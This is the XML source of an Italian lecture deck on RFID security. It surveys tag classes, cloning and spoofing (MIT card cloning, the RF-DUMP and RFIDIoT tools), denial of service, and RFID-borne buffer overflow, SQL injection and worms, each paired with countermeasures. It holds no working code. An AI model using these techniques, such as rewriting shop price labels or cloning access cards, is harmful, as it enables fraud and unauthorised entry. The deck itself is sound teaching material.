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8731" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89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E5B5-9B73-BE4D-BB8B-83F2B851559F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D098-B65F-914D-B723-7715394709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1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Write Once Read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(WORM) - passivi.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questo caso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viene prodotto senza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scrivere nessun dato nella memoria. I dati possono essere scritti dal produttore del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dall’utilizzatore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sola volta, non è possibile nessuna scrittura successiva: a questo punto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può essere solo letto.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tratta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cui può essere memorizzato solo un identificativo (fino a 256 bit) definito dall’utente.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nel caso precedente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possiede capacità di elaborazione tali da implementare sistemi di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sicurezza come crittografia autenticazione ecc.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2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passivi.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questa classe, hanno la memoria utente riscrivibile (con un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 di vita dell’ordine delle 100000 scritture), che può arrivare intorno ai 2 kb oltre ad avere un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identificativo impresso durante la fabbricazione. Dal punto di vista della sicurezza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anlcuni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appartenenti a questa classe, implementano sistemi per bloccare la scrittura non autorizzata della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memoria utente. Nel caso dei dispositivi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Mifare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(ISO 14443A) la comunicazione con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distanze sempre nell’ordine di 10-15cm) prevede sistemi di crittografia e autenticazione, cosa che in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generale i dispositivi di tipo passivo e a basso costo, come gli ISO 15693, non implementano.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classe 2 vengono spesso impiegati nei settori dove è utile avere dei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logger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direttamente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sull’oggetto (Supply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impianti di produzione, ambito sanitario). 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3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semipassivi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sensore a bordo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appartenenti a questa classe sono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equipaggiati con un sensore che consente di registrare, nella memoria utente, parametri quali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temperatura, pressione, umidità, e spostamenti. Questi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devono necessariamente avere una sorgente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 di energia poiché le letture devono poter essere effettuate dal sensore in assenza del lettore. Nei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dispositivi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semipassivi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comunque la comunicazione con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avviene, come nei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completamente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passivi, utilizzando l’energia del campo generato dal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4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attivi con trasmettitore integrato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Questi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come dei dispositivi radio in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miniatura che possono comunicare con altri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altri dispositivi in assenza del lettore. Ciò significa che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presi in esame sono completamente attivi e quindi alimentati dalla propria batteria. L’uso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attivi o semi-attivi, dotati cioè di una propria alimentazione e di memoria, consente l’utilizzo della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crittografia, sia asimmetrica che simmetrica, quindi di una autenticazione “forte”. La possibilità di scelta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un tipo di elaborazione per la sicurezza non è realizzabile su dispositivi a basso costo, in quanto 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 di energia a bordo diviene indispensabile per l’impiego di un motore di crittografia.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D098-B65F-914D-B723-7715394709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78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1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Write Once Read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(WORM) - passivi.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questo caso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viene prodotto senza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scrivere nessun dato nella memoria. I dati possono essere scritti dal produttore del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dall’utilizzatore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sola volta, non è possibile nessuna scrittura successiva: a questo punto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può essere solo letto.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tratta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cui può essere memorizzato solo un identificativo (fino a 256 bit) definito dall’utente.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nel caso precedente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possiede capacità di elaborazione tali da implementare sistemi di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sicurezza come crittografia autenticazione ecc.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2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passivi.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questa classe, hanno la memoria utente riscrivibile (con un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 di vita dell’ordine delle 100000 scritture), che può arrivare intorno ai 2 kb oltre ad avere un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identificativo impresso durante la fabbricazione. Dal punto di vista della sicurezza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anlcuni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appartenenti a questa classe, implementano sistemi per bloccare la scrittura non autorizzata della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memoria utente. Nel caso dei dispositivi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Mifare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(ISO 14443A) la comunicazione con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distanze sempre nell’ordine di 10-15cm) prevede sistemi di crittografia e autenticazione, cosa che in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generale i dispositivi di tipo passivo e a basso costo, come gli ISO 15693, non implementano.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classe 2 vengono spesso impiegati nei settori dove è utile avere dei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logger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direttamente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sull’oggetto (Supply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impianti di produzione, ambito sanitario). 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3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semipassivi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sensore a bordo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appartenenti a questa classe sono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equipaggiati con un sensore che consente di registrare, nella memoria utente, parametri quali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temperatura, pressione, umidità, e spostamenti. Questi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devono necessariamente avere una sorgente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 di energia poiché le letture devono poter essere effettuate dal sensore in assenza del lettore. Nei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dispositivi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semipassivi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comunque la comunicazione con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avviene, come nei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completamente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passivi, utilizzando l’energia del campo generato dal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 4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Read Write - attivi con trasmettitore integrato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Questi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come dei dispositivi radio in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miniatura che possono comunicare con altri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altri dispositivi in assenza del lettore. Ciò significa che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presi in esame sono completamente attivi e quindi alimentati dalla propria batteria. L’uso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attivi o semi-attivi, dotati cioè di una propria alimentazione e di memoria, consente l’utilizzo della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crittografia, sia asimmetrica che simmetrica, quindi di una autenticazione “forte”. La possibilità di scelta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un tipo di elaborazione per la sicurezza non è realizzabile su dispositivi a basso costo, in quanto la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 di energia a bordo diviene indispensabile per l’impiego di un motore di crittografia.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D098-B65F-914D-B723-7715394709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97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D098-B65F-914D-B723-7715394709B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Your Cat Infected with a Computer Virus?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D098-B65F-914D-B723-7715394709B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2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D098-B65F-914D-B723-7715394709B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2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26F5BFE-0808-0C48-A6F9-088F13194631}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr/>
              <a:t>10/05/2010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0537B85-B8C1-E945-8585-FDD1D3481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f-dump.org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fidiot.org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Sicurezza RFID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 Luigi Giorgio Claudio Mancini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9461" y="1981202"/>
            <a:ext cx="6107766" cy="1012088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Cifratura dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Infattibile sui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t> più economici</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t> costosi fattibile, ma con algoritmi deboli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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2" y="4325576"/>
            <a:ext cx="3676649" cy="21876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227" y="1981201"/>
            <a:ext cx="1475724" cy="2235945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4300752" cy="59861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Threat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299059" y="90993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Attacchi contro la riservatezza e la privacy : difese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Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779463" y="3324388"/>
            <a:ext cx="6107766" cy="122385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Disattivare i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t> fuori dal luogo di interesse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Semplice </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>nega il servizio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779463" y="4548244"/>
            <a:ext cx="3626505" cy="1648043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Politiche</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>“Leggere” non è grave come “correlare”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Limitazione dei dati </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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62093"/>
            <a:ext cx="4128097" cy="53235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Threat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II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tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>  “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scrivibili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”, possono essere clonati o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>ri-etichettati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tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C610EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”, possono essere clonati a livello radio, in quanto si limitano ad enunciare la propria identità senza autenticazione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Scenari di Attacco:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto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Modifica di etichette in documenti per falsificarli </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Modifica di una etichetta per pagare meno</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Clonazione chiavi per entrare in luoghi protetti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>[..]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Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> o Clonazione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::Schermata 2010-04-27 a 15.16.0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1616" y="2884570"/>
            <a:ext cx="4082743" cy="15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779463" y="1821446"/>
            <a:ext cx="7583488" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>MIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Proximity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Card da parte dei studenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Josh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Roach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, Keith </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Winstein</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean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6174856" cy="1129188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>La card serviva per entrare all’interno dei laboratori riservati del MIT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779463" y="4658834"/>
            <a:ext cx="4814685" cy="1722861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Tramite uno studio del segnale che emetteva la card gli studenti del MIT hanno ricreato un trasmettitore con appena 30$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Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> o Clonazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> : Esempio di Attacco I</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Immagin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149" y="4387910"/>
            <a:ext cx="2720340" cy="20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 model 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779463" y="1821446"/>
            <a:ext cx="7583488" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>RF-DUMP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7583488" cy="112918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Al sito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.rf-dump.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> è possibile scarica un programma open source scritto da un programmatore tedesco per tutte le piattaforme con il quale è possibile leggere/scrivere ISO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Smart-Label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> tramite un semplice trasmettitore. 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779464" y="4357776"/>
            <a:ext cx="4300752" cy="2075600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Tramite questo semplice programma è possibile riscrivere quindi le etichette dei supermercati e pagare meno il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>philadelfia</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> o Clonazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> : Esempio di Attacco II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 model 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215" y="3677431"/>
            <a:ext cx="3660127" cy="27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779463" y="1821446"/>
            <a:ext cx="7583488" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>RFIDIOT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779463" y="2584450"/>
            <a:ext cx="7583488" cy="1129188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Sul sito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://rfidiot.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> è possibile scaricare (e comprare lettore) un semplice programma scritto in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>pyton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> in Licenza GPL che permette di modificare, esplorare qualsiasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>RFid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Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> o Clonazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> : Esempio di Attacco III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 model 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58" y="3824762"/>
            <a:ext cx="4278891" cy="2674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Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> o Clonazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> : Contromisure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 model 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779462" y="2185768"/>
            <a:ext cx="7732549" cy="412731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Tutte le forme di protezione della riservatezza aiutano a contrastare la clonazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Autenticazione attiva</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Richiede </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> costosi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Autenticazione passiva</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Non contrasta clonazione </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Track</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and trace </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Denial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Service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mtClean="0"/>
              <a:t>I tag possono essere distrutti, rimossi o in alcuni casi riprogrammati e cancellati</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>I lettori possono essere disturbati in radiofrequenza</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean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Scenari di Attacco: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Distruzione,rimozione o riprogrammazione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> in un magazzino o negozio, con conseguente interruzione o rallentamento operativo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Utilizzo di un disturbatore in frequenza per nascondere una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>  oppure rimozione, distruzione o riprogrammazione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Denial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Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: Contromisure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779463" y="2861454"/>
            <a:ext cx="7643747" cy="235048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Qualsiasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> che entra in una zona “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C610EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>illuminata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>” da un lettore diventa visibile dal sistema contemporaneamente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Utilizzare algoritmi per evitare le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C610EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COLLISIONI</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C610E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Malware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79463" y="2087693"/>
            <a:ext cx="3657600" cy="420458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sistemi RFID interagiscono spesso con altri sistemi informatici  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>middeleware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Le informazioni lette dai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> non sono altro che input che un sistema valuta o che tramite essi si accede a un database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>La vulnerabilità di un sistema diventa proprio il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, il quale è l’”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C610EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anello debole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” dell’intero sistema.</a:t>
            </a:r>
          </a:p>
          <a:p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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Scenari di Attacco:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto contenuto 12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2906712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>overflows</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Insertion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> cross code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RFID-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RFID-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Viruses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Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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79463" y="2720788"/>
            <a:ext cx="4119708" cy="326056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Un sistema di lettura dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> RFID sia programmato per leggere RFID specifici di 128bit. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Si potrebbe portare all'interno del sistema di lettura un RFID grande 512bit -&gt; buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>middleware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>ovrascrivendo dunque l'indirizzo di ritorno sullo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> in modo che quando si ha il ritorno dalla procedura, si  verifichi un salto in un punto specifico della memoria del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, contenente codice maligno.</a:t>
            </a:r>
          </a:p>
          <a:p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779463" y="1852426"/>
            <a:ext cx="3666702" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Scenario di Attacco:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
